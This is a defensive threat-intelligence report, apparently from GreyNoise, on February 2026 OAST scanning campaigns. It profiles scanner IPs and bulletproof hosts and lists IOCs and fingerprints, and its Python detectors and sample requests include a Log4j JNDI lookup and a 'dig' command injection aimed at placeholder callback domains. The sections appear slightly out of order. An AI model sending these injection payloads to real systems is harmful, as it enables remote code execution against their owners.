## Supplemental Threat Intelligence Enrichment for Selected OAST Infrastructure (VirusTotal + Censys)

This section layers external threat intelligence from Censys and VirusTotal onto key IPs from the OAST report.

### 193.24.123.42 (PROSPERO OOO, Russia): Ivanti EPMM Attacker

VirusTotal Classification:

- 14% malicious detection rate (13/93 engines)
- Community reputation: 0 (neutral, no votes)
- Self-signed certificate for www.vvork.com (Hestia Control Panel)
- Certificate validity: 2025-07-08 to 2026-07-08
- 2 downloaded files observed (HTML, index.html)

Censys Infrastructure:

- BULLETPROOF hosting label (confidence: 0.75): Censys classifies this as bulletproof infrastructure resistant to takedown
- Location: St. Petersburg, Russia (59.9386°N, 30.3141°E)
- Only 1 service exposed: Port 111 (PORTMAP/TCP)
- Network creation: 2024-07-03 (recent allocation)
- WHOIS: PROSPERO OOO, PR-CT SOLIDARITY, D. 12 K. 2 LITERA Z, KV. 167, 193312, ST. PETERSBURG
- Abuse contact: [email protected]

Key Findings:

- The bulletproof hosting label combined with exclusive CVE-2026-1281 exploitation suggests this is purpose-built attack infrastructure
- Minimal exposed attack surface (only PORTMAP) indicates operational security awareness
- Self-signed certificate and Hestia Control Panel suggest a web hosting management interface
- Network registered 6 months before the OAST observation window

Detection Priority: CRITICAL. Bulletproof infrastructure actively exploiting 2026 vulnerabilities.

### 204.216.147.144 (Oracle Corporation, Brazil)

VirusTotal Classification:

- 4.3% malicious detection rate (4/93 engines), 1.1% suspicious (1/93)
- Community reputation: -1 (1 malicious vote)
- Resolves to vamflix.ddns.net (dynamic DNS, suspicious)
- 2 downloaded files: APK Easy Tool v1.60 Portable.zip, light-skin-3.png

Censys Infrastructure:

- Oracle Cloud (AS31898), São Paulo, Brazil
- No detailed Censys scan available (Oracle Cloud may block external scans)

Key Findings:

- DDNS resolution (vamflix.ddns.net) indicates dynamic/residential IP rotation or home-hosted infrastructure on Oracle Cloud
- Community malicious vote suggests prior abuse reports
- 591 OAST sessions across 5 campaigns with the broadest payload diversity
- GreyNoise first observed 2024-09-10 (35,367 total hits, 8 sensors): established scanning infrastructure

Detection Priority: HIGH. Oracle Cloud abuse, established malicious history.

### 179.43.146.42 (Private Layer INC, Switzerland)

VirusTotal Classification:

- 2.2% malicious detection rate (2/93)
- Community reputation: -1 (1 malicious vote)
- Certificate for dns.nullsproxy.com (Gandi CA)
- 5 domain resolutions (all suspicious): aliyundunupdate.xyz (last resolved 2026-02-08), which impersonates the Alibaba Cloud security update domain; dns.nullsproxy.com; lonatersency.com (2015); billerma.com (2015); palablersdown.com (2015)
- JARM hash: 2ad2ad0002ad2ad00042d42d0000005d86ccb1a0567e012264097a0315d7a7
- URLs observed: http://aliyundunupdate.xyz:8084/slt, http://aliyundunupdate.xyz:8084/

Censys Infrastructure:

- BULLETPROOF hosting label (confidence: 0.75)
- Location: Bellinzona, Switzerland (registered country: Panama)
- Reverse DNS: hostedby.privatelayer.com
- OS: Debian Linux with OpenSSH 10.2p1
- 4 exposed services: SSH (22): OpenSSH 10.2p1 Debian-3; HTTP (8082): Basic auth protected ("Authorization Required"); HTTP (8084): nginx default welcome page, likely C2 or malware distribution; HTTP (8089): Basic auth protected ("Restricted")
- JA4T fingerprint (Censys scan): 31856_2-4-8-1-3_1460_7, a standard Debian TCP stack. NOTE: our OAST sessions showed JA4T 32120_2-4-8-1-3_1460_7 (window 32120); this indicates the scanning tool uses a custom TCP stack modification, not the host's default stack

Key Findings:

- The aliyundunupdate.xyz domain is a typosquat impersonating Alibaba Cloud (legitimate: aliyundun.com)
- Multiple historical suspicious domains suggest long-term malicious hosting
- Nginx default page on port 8084 with no customization indicates rapid deployment
- Unique TCP window size (32120) is a high-confidence fingerprint for tracking this actor across different IPs
- Sustained 7-day scanning (Feb 7-13) with 456 sessions indicates automated, unattended operation
- GreyNoise: 43,110 hits across 38 sensors since 2026-02-03

Detection Priority: HIGH. Bulletproof infrastructure with C2 characteristics and typosquatting.

### 46.29.235.157 (AS215540, Global Connectivity Solutions LLP)

VirusTotal Classification:

- 1.1% malicious detection rate (1/93 engines), 98.9% undetected (92/93)
- No domain resolutions or SSL certificates in VirusTotal
- Community reputation: 0

Censys Infrastructure:

- Location: Amsterdam, Netherlands (NOT Denmark as initially reported)
- Reverse DNS: 40735.ip-ptr.tech
- OS: pfSense FreeBSD firewall/router
- 1 exposed service: HTTPS (443), the pfSense web GUI login page. Self-signed certificate: "pfSense GUI default Self-Signed Certificate"; certificate CN: pfSense-697f5f3d024f3; nginx frontend with PHP backend (PHPSESSID cookie); favicon hash: 5567e9ce23e5549e0fcd7195f3882816 (pfSense default); HTML title: "pfSense - Login"
- JA4T fingerprint (Censys scan): 65228_2-1-3-4-8_1460_7. TCP options 2-1-3-4-8 are a non-standard ordering (default Linux: 2-4-8-1-3). This matches one of our observed fingerprints (64240_2-1-3-1-1-4_1400_8) with similar non-standard option ordering
- WHOIS created: 2023-05-10

Key Findings:

- pfSense firewall suggests this is a router/VPN endpoint for scanning operations, not an end host
- The self-signed pfSense certificate (default install) indicates minimal operational security
- Non-standard TCP option ordering (2-1-3-4-8) is a VPN/tunnel artifact, likely WireGuard or similar
- Our OAST sessions showed 3 distinct JA4T fingerprints from this IP: 64240_2-1-3-1-1-4_1400_8 (165 sessions), the primary tool through the VPN; 65495_2-4-8-1-3_65495_7 (69 sessions), Nuclei; 33280_2-4-8-1-3_65495_7 (25 sessions), Nuclei variant. This indicates multi-tool deployment through multiple network paths (VPN + local)
- Shares JA3 fingerprint 11a384388ad36777e1a2e121495037fe with the Estonian (45.138.101.232) and Contabo (37.60.230.90) IPs
- GreyNoise: 9,881 hits across 6 sensors since 2026-02-08 (brand new)

Detection Priority: MEDIUM. Likely a security researcher or bug bounty hunter using a pfSense router for scanning.

### 147.224.178.225 (Oracle Corporation, United States)

- VirusTotal Classification: not queried individually (token conservation)
- GreyNoise carries CVE-2026-1281 AND CVE-2026-0770 tags

Key Findings from Report:

- Dual-tool deployment: uses both standard Linux JA4T (132 sessions) AND Nuclei JA4T (233 sessions)
- 365 sessions across 4 campaigns (3fk04, gt3fk, jfk04, rfk04)
- Campaign ID pattern (*fk04) suggests sequential tool runs
- GreyNoise: 23,109 hits across 10 sensors since 2026-02-01 (very recent)

Detection Priority: HIGH. Dual exploitation tools, recent infrastructure, 2026 CVE tags.

### 103.144.87.192 (Viet Storage, Vietnam)

Key Findings from Report:

- Highest OAST domain-to-session ratio: 1,177 domains / 264 sessions = 4.46 domains per session. This indicates either multi-vector payload injection (the same session hits multiple fields) or payload template reuse with rotating campaign IDs
- Campaigns: p7a5r, 97a5r (both Feb 9-13)
- JA4T: mixed Nuclei fingerprints (MSS 65495, windows 65495 and 33280)

Detection Priority: MEDIUM. High-volume scanner, Log4j focus.

### Shared Infrastructure Patterns

JA3 Cluster (3 IPs, shared TLS library):

- 46.29.235.157 (AS215540, Netherlands/pfSense): 3 JA4Ts
- 45.138.101.232 (AS41745, Estonia): 1 JA4T, 64860..1380_7 (tunnel)
- 37.60.230.90 (AS51167, Contabo, France): 1 JA4T, 64240..1460_7 (standard)

JA3 11a384388ad36777e1a2e121495037fe is shared across all three, but divergent JA4T fingerprints indicate the same application-layer tool deployed across different network configurations (pfSense VPN, tunnel MSS 1380, standard Linux).

Bulletproof Hosting Cluster:

- 193.24.123.42 (PROSPERO, Russia): CVE-2026-1281 exploitation
- 179.43.146.42 (Private Layer, Switzerland): C2 infrastructure, typosquatting

Both are labeled BULLETPROOF by Censys (0.75 confidence), indicating takedown-resistant infrastructure.
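The Detection Recommendations above call for monitoring Interactsh callback domains in request bodies, URI paths, cookies, header values and user-agent strings, and for a WAF rule that blocks any request carrying one; the Overview tallies those same six fields. The following is an added example of that field-level check, not GreyNoise's code. The request-dict layout, the mapping of its keys onto the report's six field names (with "path" taken as the path component and "uri" as the full request-target including the query string), and all sample requests are assumptions constructed for the example; the *.oast.* labels in them are placeholders, not observed callbacks.

```python
"""Field-level detection of Interactsh OAST callback domains in HTTP requests.

Added example, not GreyNoise's code. The request layout, the key-to-field mapping and
the sample requests are constructed for illustration.
"""
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote

# The five Interactsh suffixes named in the report.
OAST_SUFFIXES = ("oast.pro", "oast.live", "oast.fun", "oast.me", "oast.site")

# At least one label followed by an OAST suffix, delimited so that "toast.pro" or
# "xoast.pro" do not match. Interactsh callbacks always carry a subdomain label, so the
# bare apex is intentionally not matched.
OAST_RE = re.compile(
    r"(?<![a-z0-9-])((?:[a-z0-9-]+\.)+(?:"
    + "|".join(re.escape(s) for s in OAST_SUFFIXES)
    + r"))(?![a-z0-9-])",
    re.IGNORECASE,
)


def find_oast_domains(text: str) -> List[str]:
    """Distinct OAST hostnames in text, lower-cased, after one URL-decode pass."""
    decoded = unquote(text)  # catches %2e-style obfuscation and encoded query values
    found: List[str] = []
    for m in OAST_RE.finditer(decoded):
        d = m.group(1).lower()
        if d not in found:
            found.append(d)
    return found


def scan_request(req: Dict) -> Dict[str, List[str]]:
    """Return {field: [domains]} for every field of the request carrying an OAST domain.

    Assumed mapping: 'path' is the path component, 'uri' the full request-target with
    query; 'requestHeaderValue' covers every header except the two the report counts
    separately (User-Agent and Cookie).
    """
    headers = req.get("headers", {})
    fields = {
        "path": req.get("path", ""),
        "uri": req.get("uri", ""),
        "requestBody": req.get("body", ""),
        "useragent": headers.get("User-Agent", ""),
        "requestCookie": headers.get("Cookie", ""),
        "requestHeaderValue": "\n".join(
            v for k, v in headers.items() if k not in ("User-Agent", "Cookie")
        ),
    }
    hits: Dict[str, List[str]] = {}
    for name, value in fields.items():
        doms = find_oast_domains(value)
        if doms:
            hits[name] = doms
    return hits


def should_block(req: Dict) -> bool:
    """WAF-style decision from the recommendations: any OAST domain in any field blocks."""
    return bool(scan_request(req))


def tally_by_field(requests) -> Counter:
    """Per-field occurrence counts, the breakdown the report's Overview gives."""
    counts: Counter = Counter()
    for req in requests:
        for field, doms in scan_request(req).items():
            counts[field] += len(doms)
    return counts


# Constructed sample traffic; the *.oast.* labels are placeholders, not observed callbacks.
SAMPLE_REQUESTS = [
    {   # Log4j-style lookup inside a JSON body
        "path": "/api/login", "uri": "/api/login?next=%2F",
        "headers": {"User-Agent": "Mozilla/5.0", "Host": "example.test"},
        "body": '{"user":"${jndi:ldap://cbody0001.oast.fun/a}"}',
    },
    {   # URL-encoded query parameter, plus User-Agent and Cookie carriers
        "path": "/cgi-bin/test", "uri": "/cgi-bin/test?u=http%3A%2F%2Fcuri00001.oast.pro",
        "headers": {"User-Agent": "curl/8.0 (http://cua000001.oast.live)",
                    "Cookie": "session=abc; x=http://ccookie01.oast.me/"},
        "body": "",
    },
    {   # domain in an ordinary header value only
        "path": "/", "uri": "/",
        "headers": {"User-Agent": "Mozilla/5.0", "X-Forwarded-For": "chdr00001.oast.site"},
        "body": "",
    },
    {   # domain embedded in the path itself
        "path": "/fetch/http:/cpath0001.oast.pro/", "uri": "/fetch/http:/cpath0001.oast.pro/",
        "headers": {"User-Agent": "Mozilla/5.0"}, "body": "",
    },
    {   # benign request
        "path": "/robots.txt", "uri": "/robots.txt",
        "headers": {"User-Agent": "Mozilla/5.0"}, "body": "",
    },
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["uri"], "->", "BLOCK" if should_block(req) else "allow", scan_request(req))
    print(tally_by_field(SAMPLE_REQUESTS))
```

The single URL-decode pass is what makes the uri check useful: scanners routinely percent-encode the callback inside a query parameter, and a rule that only matches the raw bytes misses it. The same per-field dictionary feeds both the blocking decision and the occurrence tally, so the WAF rule and the reporting view cannot drift apart.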
Analysis Summary
# Incident Report: Global OAST Automated Vulnerability Scanning Campaigns
## Executive Summary
Between February 7 and February 13, 2026, GreyNoise observed a high-volume series of coordinated vulnerability scanning campaigns utilizing Out-of-Band Application Security Testing (OAST) callback domains. Attackers targeted over 100 distinct CVEs, including Ivanti EPMM (CVE-2026-1281) and Log4j, using a global network of "bulletproof" hosting, Cloudflare proxies, and Oracle Cloud infrastructure. The incident highlights a sophisticated use of automated toolkits (like Nuclei) deployed across diverse network stacks to identify exploitable enterprise assets.
## Incident Details
- **Discovery Date:** February 7, 2026
- **Incident Date:** February 7, 2026 – February 13, 2026
- **Affected Organization:** Global Observation Grid (multiple targets detected via sensors)
- **Sector:** Cross-sector (targets enterprise software, IoT, AI infrastructure, and network appliances)
- **Geography:** Global (Originating IPs from Brazil, Russia, Switzerland, USA, Vietnam, Estonia, and Netherlands)
## Timeline of Events
### Initial Access
- **Date/Time:** February 7, 2026, 00:00 UTC
- **Vector:** Automated Vulnerability Scanning / RCE Attempts
- **Details:** The `ibe4q` campaign began using Cloudflare-proxied infrastructure to inject OAST domains into HTTP request bodies, URI paths, and headers to identify vulnerable systems.
### Lateral Movement
- **N/A:** No lateral movement was observed; the primary activity was external-to-internal exploitation attempts. However, successful command injection (e.g., via `dig`) was confirmed in specific campaigns targeting Ivanti EPMM.
### Data Exfiltration/Impact
- **Impact:** Potential for Remote Code Execution (RCE). Detailed analysis of the PROSPERO OOO cluster confirmed functional command injection payloads designed to trigger DNS callbacks, indicating successful code execution on vulnerable targets.
### Detection & Response
- **Discovery:** Detected via JA4T TCP fingerprinting and JA4H HTTP header clustering on GreyNoise sensors.
- **Response Actions:** Identification and tagging of "bulletproof" IPs, clustering of actor infrastructure, and generation of GNQL queries for defensive monitoring.
## Attack Methodology
- **Initial Access:** Exploitation of 100+ CVEs (Log4j, Ivanti EPMM, Apache OFBiz, etc.).
- **Persistence:** Use of established scanning infrastructure (some active since 2024).
- **Defense Evasion:** Use of Cloudflare Workers/proxies to mask origin IPs; rotation of Tor exit nodes; usage of "bulletproof" hosting in Russia and Switzerland; deployment of custom TCP stacks to bypass simple signature-based detection.
- **Discovery:** Systematic enumeration of IP ranges (e.g., 38.48.0.0/24) and targeting of specific application endpoints (e.g., `/mifs/c/appstore/fob/`).
- **Impact:** Command injection via parameters like `gPath` to execute system-level commands (`dig`).
## Impact Assessment
- **Financial:** Unknown; potential for significant loss if RCE leads to ransomware or data theft.
- **Data Breach:** Probing for sensitive data via Path Traversal and Authentication Bypass.
- **Operational:** High-volume scanning (6,197 sessions) can cause log exhaustion or DoS on unprotected endpoints.
- **Reputational:** Public-facing enterprise assets (Ivanti, Oracle, Atlassian) were specifically targeted.
## Indicators of Compromise
### Network Indicators
- **Attacker IPs:**
  - `193[.]24[.]123[.]42` (PROSPERO OOO - Ivanti EPMM Exploitation)
  - `179[.]43[.]146[.]42` (Private Layer - aliyundunupdate[.]xyz)
  - `204[.]216[.]147[.]144` (Oracle Cloud - Brazil)
  - `104[.]28[.]193[.]87` (Cloudflare Proxy Cluster)
- **OAST Callback Domains:**
  - `*.oast[.]pro`, `*.oast[.]live`, `*.oast[.]fun`, `*.oast[.]me`, `*.oast[.]site`
- **TCP/TLS Fingerprints:**
  - JA3: `11a384388ad36777e1a2e121495037fe`
  - JA4T: `65495_2-4-8-1-3_65495_7` (Nuclei/Loopback indicator)
### Behavioral Indicators
- High ratio of OAST domains per session (indicating multi-vector injection).
- Use of `dig` commands within URI paths to test for DNS egress.
- HTTP interaction with no Referer or Cookie headers (consistent with automated scanning).
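The three behavioral indicators above can be scored per session from HTTP request fields. The following is an added detection example, not GreyNoise code; it assumes the six injection vectors named in the report, splits the request target into `path` (before `?`) and `uri` (query string) as its own convention, and runs over constructed sample requests:

```python
import re
from collections import defaultdict

# The five Interactsh callback TLDs observed in the report.
OAST_RE = re.compile(r"(?:[a-z0-9-]+\.)+oast\.(?:pro|live|fun|me|site)\b", re.I)
# Header-derived injection vectors (report names) -> HTTP header that carries them.
HEADER_VECTORS = {"requestCookie": "cookie", "useragent": "user-agent"}

SAMPLE_REQUESTS = [  # constructed sample traffic for this example, not captured data
    {"session": "scan-1", "uri": "/mifs/c/appstore/fob/?gPath=dig+c1abc.oast.pro",
     "headers": {"Host": "target", "User-Agent": "Mozilla/5.0 c1abc.oast.pro",
                 "X-Forwarded-For": "c1abc.oast.live"}, "body": "url=http://c1abc.oast.fun/"},
    {"session": "scan-1", "uri": "/c1abc.oast.me/login",
     "headers": {"Host": "target", "Cookie": "JSESSIONID=c1abc.oast.site"}, "body": ""},
    {"session": "user-1", "uri": "/index.html",
     "headers": {"Host": "target", "Referer": "https://target/", "Cookie": "PHPSESSID=abc"}, "body": ""},
]

def find_oast(req):
    """Map each of the six injection vectors to the OAST domains it carries (if any).
    Assumption: 'path' is the request target before '?', 'uri' is the query string."""
    path, _, query = req.get("uri", "").partition("?")
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    fields = {"requestBody": req.get("body", ""), "uri": query, "path": path}
    for vector, name in HEADER_VECTORS.items():
        fields[vector] = headers.get(name, "")
    fields["requestHeaderValue"] = " ".join(v for k, v in headers.items() if k not in HEADER_VECTORS.values())
    return {v: [d.lower() for d in OAST_RE.findall(s)] for v, s in fields.items() if OAST_RE.search(s)}

def score_sessions(requests):
    """Per session: OAST domain count, vectors hit, dig-in-URI, and Referer/Cookie-less requests."""
    out = defaultdict(lambda: {"requests": 0, "oast_domains": 0, "vectors": set(),
                               "dig_in_uri": False, "headerless": 0})
    for req in requests:
        s = out[req["session"]]
        s["requests"] += 1
        hits = find_oast(req)
        s["oast_domains"] += sum(len(d) for d in hits.values())
        s["vectors"] |= set(hits)
        if "uri" in hits and re.search(r"\bdig\b", req["uri"], re.I):
            s["dig_in_uri"] = True  # DNS egress test riding on a query parameter
        if not {"referer", "cookie"} & {k.lower() for k in req.get("headers", {})}:
            s["headerless"] += 1
    return dict(out)

def is_oast_scanner(s):
    """Flag automated OAST scanning: many domains per session, multi-vector, or DNS egress test."""
    return s["oast_domains"] / s["requests"] >= 2 or len(s["vectors"]) >= 3 or s["dig_in_uri"]
```

On the sample, `scan-1` lights up all six vectors with 3 domains per session while `user-1` scores nothing.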
## Response Actions
- **Containment:** Blocked known malicious IPs at the sensor level.
- **Eradication:** Defanged and analyzed malicious payloads targeting Ivanti EPMM.
- **Recovery:** Notified affected sectors regarding emerging 2026 CVE exploitation.
## Lessons Learned
- **TCP Fingerprinting Value:** JA4T was more effective than IP-based tracking, as it identified Nuclei scanners across 22 different ASNs and caught custom-stack modifications on bulletproof hosts.
- **OAST Ubiquity:** Attackers are no longer just testing one parameter; they are injecting callback domains into every possible field (Body, URI, Headers, Cookies, User-Agent).
## Recommendations
- **Patch Management:** Immediately prioritize patching **CVE-2026-1281** (Ivanti EPMM) and **Log4j**.
- **WAF Configuration:** Implement rules to block any request containing Interactsh (OAST) domains in any header or body field.
- **Infrastructure Blocking:** Apply strict scrutiny or "deny-by-default" policies to **AS200593** (PROSPERO OOO) and **AS51852** (Private Layer).
- **Monitoring:** Monitor for the specific JA4T fingerprint `65495_2-4-8-1-3_65495_7` to identify unauthorized Nuclei scanning in the environment.
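A JA4T string is `window_options_mss_scale`, so the fingerprint monitoring above can be generalized from one exact string to the per-field signals the report relies on (localhost-like MSS 65495 for Nuclei, MSS 1380 for Cloudflare proxies, option ordering other than 2-4-8-1-3 for VPN/tunnel paths). The following is an added example, not GreyNoise tooling; the "reduced MSS means encapsulation" rule and the sample fingerprints other than those quoted in the report are this example's own assumptions:

```python
from dataclasses import dataclass

LINUX_DEFAULT_OPTIONS = (2, 4, 8, 1, 3)   # option ordering the report treats as the Linux default
WATCHLIST = {"65495_2-4-8-1-3_65495_7"}    # the JA4T the report recommends monitoring for

@dataclass(frozen=True)
class JA4T:
    window: int
    options: tuple   # TCP option kinds in the order they appear in the SYN
    mss: int
    scale: int

def parse_ja4t(fp):
    """Split a JA4T string 'window_opt-opt-..._mss_scale' into its four fields."""
    parts = fp.split("_")
    if len(parts) != 4:
        raise ValueError(f"not a JA4T fingerprint: {fp!r}")
    window, opts, mss, scale = parts
    options = tuple(int(o) for o in opts.split("-")) if opts else ()
    return JA4T(int(window), options, int(mss), int(scale))

def classify(fp):
    """Return the infrastructure/tool signals the report associates with a JA4T's fields."""
    t = parse_ja4t(fp)
    signals = []
    if t.mss == 65495:
        signals.append("localhost-like MSS: Nuclei-style scanner")
    elif t.mss == 1380:
        signals.append("MSS 1380: Cloudflare proxy/tunnel traversal")
    elif t.mss == 1460:
        signals.append("MSS 1460: standard Ethernet stack")
    elif t.mss < 1460:
        signals.append(f"MSS {t.mss}: reduced by encapsulation (VPN/tunnel)")  # assumption
    else:
        signals.append(f"MSS {t.mss}: unusual, review manually")
    if t.options != LINUX_DEFAULT_OPTIONS:
        signals.append("non-standard option ordering: VPN/tunnel or custom stack")
    if fp in WATCHLIST:
        signals.append("WATCHLIST HIT")
    return signals

def same_stack_variant(a, b):
    """True when two fingerprints differ only in window size (the two Nuclei variants)."""
    x, y = parse_ja4t(a), parse_ja4t(b)
    return x.window != y.window and (x.options, x.mss, x.scale) == (y.options, y.mss, y.scale)

if __name__ == "__main__":  # fingerprints quoted in the report
    for fp in ("65495_2-4-8-1-3_65495_7", "33280_2-4-8-1-3_65495_7",
               "65535_2-4-8-1-3_1380_13", "64240_2-1-3-1-1-4_1400_8"):
        print(fp, classify(fp))
```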